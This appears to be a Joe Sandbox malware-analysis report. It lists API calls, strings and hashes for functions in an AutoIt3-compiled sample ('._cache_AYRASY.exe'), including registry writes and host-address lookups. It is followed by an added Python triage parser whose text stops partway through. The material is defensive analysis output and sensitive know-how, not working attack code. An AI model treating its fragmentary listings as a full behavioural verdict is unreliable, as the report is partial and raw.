                                                                                                                              • Opcode Fuzzy Hash: 8bd5608172f3c7258e69d79608d711c9dc5d5d7475d20fe434265a5841aaa343
                                                                                                                              • Instruction Fuzzy Hash: 78219F71904219ABDB11ABA5DC88BEEB7BDAB59304F1004EAF505E3181E775AFC4CB60
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 002E220A
                                                                                                                              • GetProcAddress.KERNEL32(?,002DBFF9), ref: 002E2228
                                                                                                                              • ExitProcess.KERNEL32(?,002DBFF9), ref: 002E2239
                                                                                                                              • VirtualProtect.KERNEL32(00170000,00001000,00000004,?,00000000), ref: 002E2287
                                                                                                                              • VirtualProtect.KERNEL32(00170000,00001000), ref: 002E229C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1996367037-0
                                                                                                                              • Opcode ID: 2d0eff96b3bd31e6c293c13b80f90b9fcc516fecbb28576c2b05e8ea84deffe4
                                                                                                                              • Instruction ID: 35f912926b5d8df917975f21c2eedf29234e29db1744217491f1db1aed51bfd4
                                                                                                                              • Opcode Fuzzy Hash: 2d0eff96b3bd31e6c293c13b80f90b9fcc516fecbb28576c2b05e8ea84deffe4
                                                                                                                              • Instruction Fuzzy Hash: 6D510A726F4293CAD7249EB9CC80660779CEB513207980738CAE7CB3C6E790591D8760
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001B78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 001B78CB
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 001BF04D
                                                                                                                              • CoCreateInstance.COMBASE(001FDA7C,00000000,00000001,001FD8EC,?), ref: 001BF066
                                                                                                                              • CoUninitialize.COMBASE ref: 001BF083
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                              • String ID: .lnk
                                                                                                                              • API String ID: 2126378814-24824748
                                                                                                                              • Opcode ID: 76732f29bd50e969bdf98e79e7ddd9485e6c0217fde9315ab22a7e74fa436401
                                                                                                                              • Instruction ID: d3505b035ce1b33fcb88353680ec40b7e21d3faad81b4c4d789c99cb2d388cdc
                                                                                                                              • Opcode Fuzzy Hash: 76732f29bd50e969bdf98e79e7ddd9485e6c0217fde9315ab22a7e74fa436401
                                                                                                                              • Instruction Fuzzy Hash: 1FA12535604301AFC714DF54C884E6ABBF6BF98320F14899CF99A9B2A1CB31ED45CB91
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNEL32(0017C848,0017C848), ref: 0018DDA2
                                                                                                                              • FindFirstFileW.KERNEL32(0017C848,?), ref: 001E4A83
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesFindFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4185537391-0
                                                                                                                              • Opcode ID: b2ea965d825451eb983ebe287d44f26c25719100d18cc0bfc0e4818a9d7a72a5
                                                                                                                              • Instruction ID: 59eee11c1f6e6839bc9cc62fddf5f92b7b1ce379624d461c556106e5b07c9638
                                                                                                                              • Opcode Fuzzy Hash: b2ea965d825451eb983ebe287d44f26c25719100d18cc0bfc0e4818a9d7a72a5
                                                                                                                              • Instruction Fuzzy Hash: 51E0DF32418901AB82187778FC0D8FE379D9B46338B200755F836C24E0EB70AE91CBDA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
• String ID:
• API String ID:
• Opcode ID: b02488b0d1ea7ec57267e356ef34d2506881048cf940c3589db46a457d73e68a
• Instruction ID: 833a1b00c35ffca5930e48cd40cbb0a1412a5929a2a4d905452affec2b8b0e19
• Opcode Fuzzy Hash: b02488b0d1ea7ec57267e356ef34d2506881048cf940c3589db46a457d73e68a
• Instruction Fuzzy Hash: AD229E70A00209DFDB24DF98D491ABEB7F0FF19310F15C0A9E85A9B391E771A985CB91
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: BuffCharUpper
• String ID:
• API String ID: 3964851224-0
• Opcode ID: eeaf8184224624fbc5f140214b8dd0d995f5544a0850ef8ffe0f5be632e535d6
• Instruction ID: 4b011729de1b1122439015d9caeef8a4714d0a9d87da61ffac72718da23588d8
• Opcode Fuzzy Hash: eeaf8184224624fbc5f140214b8dd0d995f5544a0850ef8ffe0f5be632e535d6
• Instruction Fuzzy Hash: 9E9269706082418FD724EF18C494B6AB7F0BF98704F58885DF99A8B292D771EE45CF92
APIs
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 3c767dc3cf493700f796d612fc3552bfa2c54f4e8e3ff31bf29e0d21f6a5de93
• Instruction ID: d9a421bec3f9fb996cc4a8dbb19242213f2ed413f70f78b1a41aaac1420541f2
• Opcode Fuzzy Hash: 3c767dc3cf493700f796d612fc3552bfa2c54f4e8e3ff31bf29e0d21f6a5de93
• Instruction Fuzzy Hash: C7C04CB140400DEFCB15CB90D9859FFB7BCBB04300F204495A116E2000D7709B459B71
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017E279
• timeGetTime.WINMM ref: 0017E51A
• TranslateMessage.USER32(?), ref: 0017E646
• DispatchMessageW.USER32(?), ref: 0017E651
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017E664
• LockWindowUpdate.USER32(00000000), ref: 0017E697
• DestroyWindow.USER32 ref: 0017E6A3
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017E6BD
• Sleep.KERNEL32(0000000A), ref: 001E5B15
• TranslateMessage.USER32(?), ref: 001E62AF
• DispatchMessageW.USER32(?), ref: 001E62BD
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001E62D1
Strings
Similarity
• API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 2641332412-570651680
• Opcode ID: 9f2ddca28f06a1468f7290ecb01dcc05205b32577f9119a66624e37e4cb2933b
• Instruction ID: 03057ccab5f5914649c74d5d29724bd969b48266f02d1b10a4712d48334448c2
• Opcode Fuzzy Hash: 9f2ddca28f06a1468f7290ecb01dcc05205b32577f9119a66624e37e4cb2933b
• Instruction Fuzzy Hash: D262D270508780DFDB24DF24C885BAA77F5BF58308F1489ADF94A8B292DB71D984CB52
APIs
• ___createFile.LIBCMT ref: 001A6C73
• ___createFile.LIBCMT ref: 001A6CB4
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 001A6CDD
• __dosmaperr.LIBCMT ref: 001A6CE4
• GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 001A6CF7
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 001A6D1A
• __dosmaperr.LIBCMT ref: 001A6D23
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 001A6D2C
• __set_osfhnd.LIBCMT ref: 001A6D5C
• __lseeki64_nolock.LIBCMT ref: 001A6DC6
• __close_nolock.LIBCMT ref: 001A6DEC
• __chsize_nolock.LIBCMT ref: 001A6E1C
• __lseeki64_nolock.LIBCMT ref: 001A6E2E
• __lseeki64_nolock.LIBCMT ref: 001A6F26
• __lseeki64_nolock.LIBCMT ref: 001A6F3B
• __close_nolock.LIBCMT ref: 001A6F9B
  • Part of subcall function 0019F84C: CloseHandle.KERNEL32(00000000,0021EEC4,00000000,?,001A6DF1,0021EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0019F89C
  • Part of subcall function 0019F84C: GetLastError.KERNEL32(?,001A6DF1,0021EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0019F8A6
  • Part of subcall function 0019F84C: __free_osfhnd.LIBCMT ref: 0019F8B3
  • Part of subcall function 0019F84C: __dosmaperr.LIBCMT ref: 0019F8D5
  • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
• __lseeki64_nolock.LIBCMT ref: 001A6FBD
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 001A70F2
• ___createFile.LIBCMT ref: 001A7111
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 001A711E
• __dosmaperr.LIBCMT ref: 001A7125
• __free_osfhnd.LIBCMT ref: 001A7145
• __invoke_watson.LIBCMT ref: 001A7173
• __wsopen_helper.LIBCMT ref: 001A718D
Strings
Similarity
• API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
• String ID: @
• API String ID: 3896587723-2766056989
• Opcode ID: c28529b102f71f26e7cacba665d5857e9285aff6ffe2964fb7285e765518ad16
• Instruction ID: 096fb762a27bd20a2dec740f1787d094352eda29c5609323183177d399f61afd
• Opcode Fuzzy Hash: c28529b102f71f26e7cacba665d5857e9285aff6ffe2964fb7285e765518ad16
• Instruction Fuzzy Hash: 2E223479A042059FEF299F68DC95BBE7B61EB13324F2C4229E521EB2E1C7358D50C760
APIs
• GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 001B76ED
• GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 001B7713
• _wcscpy.LIBCMT ref: 001B7741
• _wcscmp.LIBCMT ref: 001B774C
• _wcscat.LIBCMT ref: 001B7762
• _wcsstr.LIBCMT ref: 001B776D
• 751C1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001B7789
• _wcscat.LIBCMT ref: 001B77D2
• _wcscat.LIBCMT ref: 001B77D9
• _wcsncpy.LIBCMT ref: 001B7804
Strings
Similarity
• API ID: _wcscat$FileInfoVersion$C1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 2588870415-1459072770
• Opcode ID: 3c0bec22612c27f3ee36c2f848945ce5953eff176c99af63ac2565a14a2eee68
• Instruction ID: e26f87e5a8facde2215b52a565b7a43772b43f263563302568ab5ef6c4ce702a
• Opcode Fuzzy Hash: 3c0bec22612c27f3ee36c2f848945ce5953eff176c99af63ac2565a14a2eee68
• Instruction Fuzzy Hash: E741F771A44201BAEF01B7649C4BEFF77ACEF6A710F10006AF900A61D3EB74DA51D6A1
APIs
  • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
• GetForegroundWindow.USER32 ref: 00171FBE
• IsWindow.USER32(?), ref: 001E282E
Strings
Similarity
• API ID: Window$Foreground_memmove
• String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
• API String ID: 3828923867-1919597938
• Opcode ID: 54b3f3b40c5b89cdf26fd376667d3e6e86dc47bfd6293804861efc44b372d1ac
• Instruction ID: e8c94077df00d6cdb51b399b87c5a83162210cbac17d88854e7615e2755f38c1
• Opcode Fuzzy Hash: 54b3f3b40c5b89cdf26fd376667d3e6e86dc47bfd6293804861efc44b372d1ac
• Instruction Fuzzy Hash: A4D11B30104B42EBCB08EF61D491EADBBF5BF64344F148A2DF455575A2CB30E99ACB92
                                                                                                                              APIs
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D3626
                                                                                                                              • RegCreateKeyExW.KERNEL32(?,?,00000000,0020DBF0,00000000,?,00000000,?,?), ref: 001D3694
                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001D36DC
                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 001D3765
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 001D3A85
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 001D3A92
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                              • API String ID: 536824911-966354055
                                                                                                                              • Opcode ID: b0435c3571df383c562bd0c6c6020b3ba984ba8b86ba765124d909111f03be7e
                                                                                                                              • Instruction ID: 9bab60e3d7f5a2a6bdf886df7c0e914ede0ffdf37cc30389cdcd7842cd4ad427
                                                                                                                              • Opcode Fuzzy Hash: b0435c3571df383c562bd0c6c6020b3ba984ba8b86ba765124d909111f03be7e
                                                                                                                              • Instruction Fuzzy Hash: 49024875200602AFCB14EF24C895E2AB7F5FF99320F058559F89A9B361DB70EE41CB42
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,00000000,00000001,00000000), ref: 0017428C
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                                • Part of subcall function 00191BC7: __wcsicmp_l.LIBCMT ref: 00191C50
                                                                                                                              • _wcscpy.LIBCMT ref: 001743C0
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 001E214E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_AYRASY.exe$CMDLINE$CMDLINERAW
                                                                                                                              • API String ID: 861526374-3669391713
                                                                                                                              • Opcode ID: 6bf651cdb8b6b82121ea800e8d26e0c7b333f1f7ef52bfb40b612949d2cad665
                                                                                                                              • Instruction ID: a811bee5c95e32c7fb59b3b10f03f5e9827088ca38816a8d3d98b7dedb9deffd
                                                                                                                              • Opcode Fuzzy Hash: 6bf651cdb8b6b82121ea800e8d26e0c7b333f1f7ef52bfb40b612949d2cad665
                                                                                                                              • Instruction Fuzzy Hash: FB817072900219ABCB05EBE0DD56EEFB7BCAF25350F504019E54AB7082EB706B45CBA1
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0018EA39
                                                                                                                              • __wsplitpath.LIBCMT ref: 0018EA56
                                                                                                                                • Part of subcall function 0019297D: __wsplitpath_helper.LIBCMT ref: 001929BD
                                                                                                                              • _wcsncat.LIBCMT ref: 0018EA69
                                                                                                                              • __makepath.LIBCMT ref: 0018EA85
                                                                                                                                • Part of subcall function 00192BFF: __wmakepath_s.LIBCMT ref: 00192C13
                                                                                                                                • Part of subcall function 0019010A: std::exception::exception.LIBCMT ref: 0019013E
                                                                                                                                • Part of subcall function 0019010A: __CxxThrowException@8.LIBCMT ref: 00190153
                                                                                                                              • _wcscpy.LIBCMT ref: 0018EABE
                                                                                                                                • Part of subcall function 0018EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0018EADA,?,?), ref: 0018EB27
                                                                                                                              • _wcscat.LIBCMT ref: 001E32FC
                                                                                                                              • _wcscat.LIBCMT ref: 001E3334
                                                                                                                              • _wcsncpy.LIBCMT ref: 001E3370
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                              • String ID: Include$\$"#
                                                                                                                              • API String ID: 1213536620-3510780041
                                                                                                                              • Opcode ID: 84a9e571a677dbbc8bec5a5c139bb8f4622696d56ed013570f2724484c9e0e9f
                                                                                                                              • Instruction ID: 53d7f902c028ed63876c30cbe478f72b0c0db24a99ed250c94534d42adac0de3
                                                                                                                              • Opcode Fuzzy Hash: 84a9e571a677dbbc8bec5a5c139bb8f4622696d56ed013570f2724484c9e0e9f
                                                                                                                              • Instruction Fuzzy Hash: 7D514BB2414380EBC719EF65FC89C9BB7F8FB59300B80496EF54583261EB749648CB66
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                              • String ID: 0.0.0.0
                                                                                                                              • API String ID: 208665112-3771769585
                                                                                                                              • Opcode ID: bce607fd5b32110bce83f25eff4380c4661a32456c76913818235722d1a77175
                                                                                                                              • Instruction ID: d8912b8df0a11784c3e9565a134ab5c69144f62a6057499231cdf85584392d18
                                                                                                                              • Opcode Fuzzy Hash: bce607fd5b32110bce83f25eff4380c4661a32456c76913818235722d1a77175
                                                                                                                              • Instruction Fuzzy Hash: 01119071A08115AEDF24A760AC4AAFA77AC9B55728F0001A5F445961D1EB70DA818AA0
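The entries above are the raw per-function output of Joe Sandbox's function analysis for the AutoIt3 runtime inside `._cache_AYRASY.exe`: a registry routine at 001D3626-001D3A92 (RegConnectRegistryW, RegCreateKeyExW, RegSetValueExW, with the REG_* value-type names as its strings), the script command-line parser carrying `/AutoIt3ExecuteScript` and `CMDLINE`, and a host-address lookup whose API ID names gethostname, gethostbyname and inet_ntoa with `0.0.0.0` as its string. Reading dozens of such entries by hand is slow, so the Python below, which is an added example and not code from the Joe Sandbox report or from the analysed sample, parses the `• Api.Module(args), ref: addr` call lines together with the `API ID` and `String ID` similarity lines and tags each function with a coarse capability. The capability groupings, the function names and the `SAMPLE` text (copied from the entries above) are assumptions for illustration.

```python
"""Triage helper for Joe Sandbox function-analysis listings.

Added example, not part of the Joe Sandbox report or of the analysed
sample. It parses the "• Api.Module(args), ref: addr" call lines and the
"• API ID:" / "• String ID:" similarity lines printed for each analysed
function, then tags each function with a coarse capability label. The
capability groupings are an assumed triage heuristic, not Joe Sandbox's.
"""
import re

# The report prints an "APIs" heading at the top of every function entry,
# so that heading is the record boundary.
ENTRY_START = "APIs"

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SIM_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID):\s*(?P<val>.*)$")

# (label, API names) pairs; any hit on a name yields the label. Assumption:
# a reasonable first-pass grouping for an AutoIt-compiled sample like this one.
CAPABILITIES = [
    ("registry-write", {"RegSetValueExW", "RegCreateKeyExW", "RegConnectRegistryW"}),
    ("local-ip-discovery", {"gethostname", "gethostbyname", "inet_ntoa"}),
    ("com-object-access", {"CoGetObject", "CoGetInstanceFromFile", "GetRunningObjectTable"}),
    ("self-path-lookup", {"GetModuleFileNameW"}),
]

# Constructed input: three entries copied from the report text above. The
# third one has no explicit call lines, exactly as the report shows it.
SAMPLE = r"""APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D3626
• RegCreateKeyExW.KERNEL32(?,?,00000000,0020DBF0,00000000,?,00000000,?,?), ref: 001D3694
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 001D3765
• RegCloseKey.ADVAPI32(00000000), ref: 001D3A92
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,00000000,00000001,00000000), ref: 0017428C
  • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
• _wcscpy.LIBCMT ref: 001743C0
Similarity
• API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
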